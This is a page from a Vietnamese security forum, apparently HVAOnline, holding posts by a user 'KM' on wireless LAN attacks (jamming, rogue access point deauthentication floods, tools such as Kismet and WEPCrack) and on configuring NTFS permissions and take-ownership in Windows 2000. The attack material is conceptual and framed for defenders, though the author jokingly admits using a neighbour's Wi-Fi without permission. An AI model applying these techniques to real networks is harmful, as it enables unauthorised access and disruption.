Tất cả các quản trị mạng hoặc manager đều rất sợ cách tấn công này vì nó rất dễ phát động và hậu quả cũng rất nặng nề.Nhất là đối với lãnh vực mạng không dây, có rất nhiều cách tấn công DoS tinh vi rất đáng lo ngại.
Bởi vì tần số sử dụng hiện tại cho chuẩn 802.11 b thậm chí 802.11g sử dụng tần số 2.4Ghz radio rất lộn xộn và không kiểm soát được.Và tần số này cũng xài chung cho rất nhiều thiết bị như lò nướng VIBA, điện thoại mẹ bồng con…và nhiều thiết bị nữa tạo nên sự đa dạng trong cách tấn công DoS của hacker.Hacker có thể dùng 1 trong những thiết bị trên để tạo cuộc tấn công bằng cách gây nhiễu không gian truyền thông và có thể làm shutdown cả hệ thống mạng.
Kẻ tấn công còn có thể giả lập máy trạm của mình là 1 Access Point để thực hiện DoS attack.Sau khi giả lập Access Point hacker sẽ làm tràn ngập không gian truyền thông dai dẳng với các lệnh phân cách để đá văng những kết nối trong WLAN và tiếp tục ngăn chặn các kết nối.

Kết luận:

Nghe đọc đến đây bạn sẽ nghĩ trời vậy xài Wireless LAN làm gì.Xin thưa rằng những cái tôi viết trên đây chỉ để nhắc nhở bạn về các khả năng bị tấn công khi xây dựng hệ thống WLAN.
Không thể bỏ qua 1 xu thế thời đại như vậy vì tính tiện lợi do WLAN mang lại rất cao và mạng lại nhiều hiệu quả lớn.
Khi tôi ngồi thu thập thông tin để viết bài này thì tôi cũng đang mượn tạm 1 kết nối vào Access Point của anh hàng xóm tốt bụng (không biết có tốt hay không vì chưa sang xin phép).Đường truyền của nhà anh ta thật mạnh.Cảm ơn công nghệ Wi-Fi.Cám ơn anh hàng xóm.

PS: Bài này là do tôi thu thập thông tin và viết lại bằng tiếng Việt để chia sẻ cho mọi người tham khảo.Tôi nói trước như vậy vì vụ Bảo Chấn đang ầm ỉ.Tôi không muốn 1 ngày nào đó ai thấy bài viết của tôi giống của ai đó trên Internet mà la làng cả.j/k

Tác giả: KM
Giới thiệu:

Trong bài viết này tôi chỉ chú trọng giải thích về cách các hacker thường dung để tấn công hệ thống WLAN, một hệ thống vẫn còn đang rất mới mẻ đối với nhiều người.
Dĩ nhiên khi đã thiết lập hệ thống mạng thì điều quan tâm thứ nhì sau việc cài đặt hoạt động chính là vấn đề đau đầu làm sao để để bảo mật được hệ thống.Bạn không thể bảo vệ được hệ thống của bạn nếu bạn không hiểu rõ các phương pháp tấn công và các công cụ của các hacker sử dụng.
Hệ thống mạng không dây (Wireless LAN) theo chuẩn 802.11 hiện nay đã được áp dụng khắp nơi trên thế giới.Việt Nam cũng sẽ phát triển vì đây là xu hướng tất yếu vì rất nhiều thuận lợi do WLAN mang lại.Rất nhiều các doanh nghiệp thiết lập WLAN cho hệ thống mạng LAN nội bộ vì tính dễ dàng tiện dụng và nhất là không còn phải thấy cảnh dây nhợ (cable) chập chùng trong phòng làm việc của mình và của công ty.

Với WLAN cho phép nhân viên sử dụng laptop và những thiết bị mobile khác kết nối và hệ thống bất cứ nơi nào trong phạm vi công ty.
Nhiều người nghĩ rằng cài đặt hệ thống chạy được với đầy đủ tính năng quảng cáo trong thiết bị là đã an toàn thật sai lầm.Với suy nghĩ đó là bạn đã trao cho các hacker 1 thuận lợi đáng giá khi họ tấn công hệ thống của bạn.

Đa số Wireless Access Point (WAP) được gắn vào network với suy nghĩ và mục đích là làm cầu nối giữa máy chủ và các máy trạm với nhau.
Bạn thấy thuận tiện quá bạn có thể truy cập dữ liệu từ phòng họp, trong văn phòng làm việc và thậm chí ngay cả trong bãi đậu xe.
Bạn không quan tâm đến khoảng cách tối đa của WAP device là bao nhiêu.Khi ngồi xa hơn vị trí của WAP device bạn sẽ thấy tốc độ giảm xuống nhưng who care.
Đây cũng chính là điểm yếu của bạn.Với 1 kiểu setup như thế thì dĩ nhiên bạn thuận lợi thì hacker cũng rất thuận lợi khi lọt vào tầm phủ song của WAPs và có thể hoạt động như 1 máy trạm của WLAN và sẽ cài đặt chương trình nghe lén (Sniffer) một cách dễ dàng.

Điều đó chứng tỏ một kẻ nghịch ngợm nào đó có thể truy cập vào hệ thống mạng công ty.WAPs có thể bị lợi dụng bởi bất cứ ai am hiểu về nó nếu bạn không có cái nhìn đúng đắn về mặt bảo mật.
Những quản trị mạng thậm chí cũng không biết hệ thống của mình hoạt động ra sao mà họ chỉ coi mình là những người có thể cài đặt lại hệ thống khi có sự cố xảy ra.

Giới thiệu về những công cụ phổ biến hỗ trợ tấn công WLAN

Netstumbler - Wireless Access Point identifier - dò tìm SSIDs và dò tìm các Access Point.

Kismet - Wireless sniffer and monitor - Chương trình nghe lén và đánh cắp thong tin truyền thong trên mạng.Có thể dung để dò SSIDs, địa chỉ MAC, kênh kết nối và tốc độ của hệ thống.

Wellenreiter - WLAN discovery tool- dung để brute force và dung để dấu địa chỉ MAC của máy mình.

WEPCrack - Encryption Breaker - Dùng để giải mã chuẩn 802.11 WEP Keys

Một số thuật ngữ trong WLAN.


Antennas : là cây angten dung để phát song cho các thiết bị kết nối không dây ở khoảng cách xa nhiều cây số.

Breaking Encryption : Là thuật ngữ nói về giải mã các khóa đã được mã hoá theo phương thứ WEP.Kỹ thuật mã hoá này có thể dung các tool như WEPCrack,AirSnort… phá giải vì do 1 số lỗi trong thuật toán của phương thức mã hoá WEP.

Authentication : Phương thức mã hoá dung trong WLAN.

War Driving : Đơn giản là hacker lái xe chạy vòng vòng để dò ra những hệ thống WLAN không được bảo vệ kỹ càng.

Hết phần 1 -

Đón đọc phần 2 :

Những cách tấn công thông dụng:

Malicious Association - Khi kẻ ác ra tay
MAC Spoofing ,identity theft - Kẻ cắp giả danh
Man-in-the-middle Attacks - Kẻ đứng giữa.
Denial-of-Service - Không hack được thì cho mày chết.

KM
Những việc cần làm khi cấp quyền truy cập NTFS.

1. Cấp quyền truy cập NTFS trước khi chia sẻ 1 thư mục. Và tại soa lại cần như vậy? Bằng cách này bạn ngăn ngừa được tình trạng người dùng nối kết và truy cập thư mục hay tập tin trước khi bạn đảm bảo an toàn cho chúng.

2. Hãy cấp quyền cho nhóm thay vì cho từng người dùng cá thể.Nếu người dùng là thành viên của 1 nhóm vốn có quyền truy cập 1 số tập tin nhất định, bạn có thể chấm dứt khả năng truy cập của người dùng bằng cách loại người này ra khỏi nhóm, thay vì phải mất công thay đổi cấp độ truy cập trên thư mục và tập tin.
Và còn thú vị hơn nhiều lần khi trên Win2k xuất hiện OU sẽ còn giúp ích cho các admin những vấn đề mà chúng ta không lường tới được. Cái này tôi sẽ đề cập trong 1 bài khác.

3. Cấp quyền truy cập mọi tập tin điều hành ở quyền READ cho nhóm user và nhóm Administrator.

4. Bạn hãy hướng dẫn các nhân viên của bạn hay đúng hơn là các user dưới quyền bạn sử dụng chung 1 máy tính ấn định quyền truy cập các tập tin và thư mục do họ sở hữu.

5. Các tập tin chương trình bị hủy hoại thường là do tai nạn hoặc do virus. Để ngăn ngừa sự cố này hãy cấp quyền ở mức độ READ cho mọi tài khoản người dùng kể cả Administrator. Bằng cách này bạn sẽ ngăn không cho người dùng hay Virus phá hoại hoặc sửa đổi tập tin chương trình (file System).
Ngoài ra hãy cấp cho group Admin quyền truy cập đặc biệt ớ cấp độ change permission. Sao cho thành viên của nhóm này có thể tự cấp cho mình quyền ít hạn chế hơn khi cần có sự thay đổi bắt buộc trong công việc.

6. Dùng biến%username% tạo thư mục cá nhân-giúp đơn giản hóa công tác quản trị bằng cách tự động cấp cho mỗi người dùng quyền FC khi họ tạo ra thư mục đó.

7. Cấp cho nhóm Creator Owner quyền truy cập thư mục Data ở cấp độ FC ,như thế người dùng chỉ có quyền FC đối với những thư mục hay tập tin mà họ tạo ra trong thư mục Data.

8. Đối với tài khoản người dùng hãy đặt tên dài có tính mô tả.Hoạch định
cách đặt tên trướckhi làm.Nếu 1 thư mục được chia sẻ hãy đặt tên sao cho mọi máy khác đều có thể đọc được chúng.

Tài liệu tham khảo:

1.

MicroSoft Training and Certification Implementing MicroSoft Window 2000
2.

Professional and Server Workbook
I. GIÀNH QUYỀN SỞ HỮU TẬP TIN VÀ THƯ MỤC

Mặc định ngừoi dùng nào tạo ra tập tin hoặc thư mục sẽ nghiễm nhiên là chủ sở hữu của tập tin và thư mục hoặc tập tin đó.Khi đã là chủ sở hữu bạn có thể ấn định quyền truy cập nhằm kiểm soát những gì ngừoi khác có thể thực hiện cho tập tin và thư mục này.Trong vài trường hợp có lúc những ngừoi quản trị hay còn gọi là administrator cần phải tước bỏ quyền sở hữu của bạn.Đó gọi là Take Ownership.


Để dễ hiểu tớ xin có 1 vd đơn giản thế này:Bạn làm việc trong 1 công ty và bạn nắm 1 server lien quan đến việc quản lí cho phép users có thể truy suất xem tài liệu trong server này.Nhưng vì 1 lỗi lầm nghiêm trọng và bạn bị đuổi việc…Bạn ấm ức trong long và muốn làm phản công ty hihihihi… .bạn tạo ra rất nhiều thư mục chứa file có tính phản lại hoạt động của công ty.bạn tạo password rất kĩ luỡng cho các folder và file này.Bạn rời công ty và hy vọng sẽ trả thù được lão giám đốc bằng những hành động của bạn.
Nhưng bạn đã nhầm vì Administrator (Domain Controller) hoàn toàn có khả năng tước bỏ quyền sở hữu thư mục hay tập tin của bạn sễ như bỡn….

1) Mục Tiêu Của Tôi Trong Bài Này Là Giúp Các Bạn Thực Hiện Điều Đó
-Giải Thích Khái Niệm Giành Quyền Sở Hữu Tập Tin và Thư Mục (Tôi Đã Nêu Ở Trên)
-Giải Thích Cách Cung Cấp Khả Năng Giành Quyền Sở Hữu Tập Tin Và Thư Mục CHo Users
-Xác Định Chủ Sở Hữu Hiện Hành Của Tập Tin Và Thư Mực
-Cách Làm
2) Chủ sở hữu có thể luôn chi phối khả năng truy cập tập tin và thư mục
Bằng cách thay đổi quyền truy cập áp đặt lên thư mục và tập tin đó.Nhưng người dùng không thể chia sẻ
thư mục hoặc cấp quyền truy cập cho những thư mục không thuộc quyền sở hữu của họ.

Và nếu bạn nào rời công ty mà để lại 1 folder có password thì 5 sao trong HVA hoàn toàn có quyền thay đổi hoặc cấp cho folder đó permission mới.

II. CÁCH GIÀNH QUYỀN SỞ HỮU
Mặc định những ngừoi dùng là thành viên cảu nhóm Administrator luôn có khả năng giành quyền sở hữu kột tập tin hay thư mục.Nếu 1 ngừoi trong nhóm Admin dành quyền sở hữu thì đương nhiên cả group Admin cũng sẽ có quyền trong tài nguyên này.

Cách làm dưới đây giúp các bạn thực hiện điều đó

Đăng nhập với tư cách là 1 nhà quản trị
Trong tag Security của hộp thoại (Rclick vào thư mục chọn Properties) hoặc tập tin.Nhấp OwnerShip để xác định chủ sở hữu hiện hành.
Click Take Owner Ship trong hộp thoại Owner

III. CUNG CẤP KHẢ NĂNG GIÀNH QUYỀN SỞ HỮU CHO NGƯỜI DÙNG
Một ngừoi sở hữu tài nguyên không thể thay đổi quyền sở hữu một tài nguyên do anh ta làm chủ,mà chỉ có thể cho phép ngừoi dùng hoặc nhóm khác có khả năng dành quyền sở hữu tài nguyên.Tài nguyên sẽ vẫn được bảo vệ bằng cách ngăn không cho ngừoi dùng tạo hoặc hiệu chỉnh tập tin.
Là chủ sở hữu của tập tin bạn có thể cấp cho ngừoi dùng hoặc nhóm khả năng giành quyền sở hữu tập tin hoặc thư mục bằng cách cấp một trong những quyền sau:
-Quyền Truy Cập Chuẩn : Full Control
-Quyền Truy Cập Đạc Biệt : Take Ownership (Với cấp độ này ngừoi dùng có thể tự cấp cho mình hay cho nhóm khác quyền take ownership).

IV. XÁC ĐỊNH CHỦ SỞ HỮU VÀ QUYỀN TRUY CẬP MỘT TẬP TIN
1.Đăng nhập với tư cách nhà quản trị
2.Khỏi động WindownsNT, 2000 Explorer sau đó tạo 1 tập tin văn bản có tên Owner.txt trong thư mục LabFiles
3.Right Click lên tập tin Owner.txt chọn Properties
Hộp Thoại Owner.rxt Properties xuất hiện
4.Click Tab Security click tiết Ownership
Chủ sở hữu hiện hành là nhóm Administrator
5.Nhấp Close, nhấp Permission.Nhóm Everyone có quyền truy cập FC

V. CẤP QUYỀN TAKEOWNER CHO MỘT NGỪOI DÙNG
1.Trong hộp thoại File Permis click Add
Hộp thoại Add users And Groups mở ra
2.Kiểm tra nhằm đảm bảo rằng tên vùng của bạn hiển thị trong hộp thoại List Names From.
3.Click Show Users.
4.Chọn Sales rồi click Add
5.Từ hộp Type of Access nhấp Read….Click OK
Trong Sales xuất hiện trong hộp thoại File Permission và có quyền ở cấp độ READ
6.Click sales click tiếp Special Access từ hộp Type of Access.Và Special Access mở ra
7.Đánh giấu vào Take Ownership click OK 3 lần để áp dụng các thay đổi
Thế là xong
Cách giành quyền sở hữu 1 tập tin cũng tương tự như vậy….



CẤP QUYỀN TRUY CẬP NTFS

I. Các Yêu Cầu Đặt Ra Khi Cấp Quyền Truy Cập NTFS
Muốn cấp quyền truy cập NTFS,bạn phải là chủ sở hữu của tập tin hoặc thư mục,hoặc bạn có quyền trong 1 những cấp độ sau đây:
.Quyền truy cập chuẩn :Full Control
.Quyền truy cập đạc biệt :Change Permissions
.Quyền truy cập đặc biệt :Take Ownership (Với quyền truy cập này ngừoi dùng có thể dảnh quyền sở hữu một tập tin hoặc thư mục của ngừoi khác,và có thể thay đổi quyền truy cập áp dụng cho thư mục hay tập tin này.) Ngày xưa tôi học là tôi khoái nhất món này…


II. Các Cấp Độ Mặc Định (Default) Của Quyền Truy Cập NTFS
Khi một volume được định dạng với NTFS,quyền truy cập ở cấp độ Full Control tự động được cấp cho nhóm Everyone,cho phép toàn bộ ngừoi dùng được phép Log on locally toàn quyền truy cập Volume đó.
Khi có thư mục hoặc tập tin mới được tạo trên volume NTFS,thư mục /tập tin này sẽ thừa hưởng tất cả các quyền truy cập ấn định cho thư mục chứa nó.

III. Cấp Quyền Truy Cập Tập Tin Và Thư Mục NTFS Muốn cấp quyền cho thư mục nào bạn chỉ cần click phải chuột lên thư mục đó chọn Properties sau đó chọn Tab Security-Permissions.

Nếu bạn cấp quyền cho forlder thì hộp thoại Directory permissions mở ra.Nếu là file thì hộp thoại File Permission sẽ mở ra.Và bạn sẽ cấp quyền với mục đích đã hoạch định trước do bạn hoặc công ty của bạn đề ra.

IV. Cấp Quyền Truy Cập Thư Mục Public cho nhóm Users. 1.Đăng nhập với tư cách admin và khỏi động Windowns NT &2000 Exploer
2.Mở rộng thư mục LabFiles,Rclick lên thư mục Public chọn Properties.
3.Chọn Tab SecurityPermissions
Hộp thoại Directory Permissions mở ra.
Bạn nên chú ý rằng nhóm Everyone được cấp quyền truy cập NTFS ở cấp độ NTFS theo mặc định.
4.Nhấp add trong Directory Permissions.
Mở hộp thoại Add Users and Groups.
5.Kiểm Tra để đảm bảo tên vùng của bạn đã hiển thị trong hộp thoại List Names From.
6.Dứoi Name,click Users,nhấp tiếp Add.
7.Click Add&Read trong hộp thoại Type of Access sau đó OK
8.Dứoi Names,nhấp Everyone (nếu everone được chọn) thì nhấp remove.
Và lúc này các bạn đã loại nhóm mặc định Everyone ra khỏi danh sách.

V. CẤP QUYỀN TRUY CẬP THƯ MỤC PUBLIC CHO NHÓM CREATOR OWNER Ở phần này tôi giới thiệu cùng các bạn về việc cấp quyền FC cho nhóm Creator Owner để họ có thể hiệu chỉnh các tập tin riêng của họ.
1.Trong hộp thoại Directory Permissions click Add.
Hộp thoại Add Users and Groups xuất hiện.
2.Kiểm Tra nhằm bảo đảm tên vùng của bạn đã hểin thị trong List Names From.
3.Dứoi Names,click Creator Owner rồi click Add.
4.Click FC trong hộp thoại Type of Access,nhấp OK
Và lúc này nhóm Creator Owner đã xuất hiện trong hộp thoại Directory Permis với cấp độ FC

VI. CẤP QUYỀN TRUY CẬP THƯ MỤC PUBLIC CHO NHÓM ADMINISTRATOR
1.Trong hộp thoại Directory Permiss bạn click vào Add
Hộp Thoại Add Users And Groups Mở ra .
2.Kiểm tra (check) nhằm bảo đảm tên vùng của bạn đã hiển thị trong hộp List names From.
3.Dứoi Names click Administrator,sau đó click Add
4.Click FC từ hộp thoại Type of Access,rồi nhấp OK
Trong hộp thoại Directory Permis ta thấy nhóm Administrator và nhóm Creator Owner được cấp quyền FC,còn nhóm user thì chỉ có Add&Read
5.Các bạn chọn check vào ô Replace permis on Subdirectories sao cho cấp độ truy cập áp dụng cho tất cả các thư mục trong hệ thống mạng phân tầng.
6.kiểm tra nhằm đảm bảo Replace permis on Existing Files đã được chọn click OK.
7.Click Yes quay về hộp thoại Public Properties rồi click OK áp dụng cho các thây đổi.

VII. CẤP QUYỀN TRUY CẬP ĐẶC BIỆTTrong hầu hết các trường hợp của Windows quyền truy cập chuẩn (standard permission) là tất cả những gì bạn cần để bảo vệ tập tin và thư mục.Tuy nhiên trong 1 vài trường hợp bạn sẽ cần chỉ định quyền truy cập đặc biệt (special access permiss) quyền này cho phép bạn có khả năng cấp quyền truy cập cá nhân (individual) cho từng tài khoản hoặc cho group.
Bạn nên cấp quyền truy cập đặc biệt cho user nhằm mục đích sau:
.Cho phép ngừoi dùng khác quản lí quyền truy cập những tập tin do bạn sở hữu,cấp cho ngừoi dùng quyền truy cập ở cấp độ Change Permis (P)
.Bảo vệ các tập tin chương trình hỏi bị huy bỏ do sơ ý hoặc do Virus phá hoại,cấp cho mọi tài khoản ngừoi dùng,kể cả tài khoản của nhà quản trị Administrator ý mà .Cấp quyền truy cập ở cấp độ READ đối với các tập tin điều hành.
.Cho phép nhà quản trị chỉnh sửa tập tin điều hành,cấp cho nhóm Administrator quyền truy cập Change Permissions.Quyền truy cập này cung cấp cho nhà quản trị khả năng thay đổi quyền truy cập với những tập tin chỉ đọc Read only nếu cần.

Các bạn chú ý 1 điều rằng: Quyền truy cập đạc biệt này giống nhau cho cả tập tin và thư mục.

Tóm tắt: Trong phần 4 này bạn cần lưu ý những điểm sau:

-Muốn cấp quyền truy cập NTFS bạn phải là chủ sở hữu của tập tin hoặc thư mục,phải có quyền truy cập ở cấp độ FC,hoặc phải có quyền truy cập ở cấp độ Change Permiss hay Take Ownership.
-Khi 1 volume được định dạng NTFS,nhóm Everyone tự động được cấp quyền FC (Các bạn nên chú ý điều này)
-Sử dụng quyền truy cập đạc biệt khi bạn cần chỉ định 1 kết hợp giữa nhiều cấp độ thuộc quyền truy cập chuẩn

 
Go to Page:  First Page Page 20 21 22 23 Page 25 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|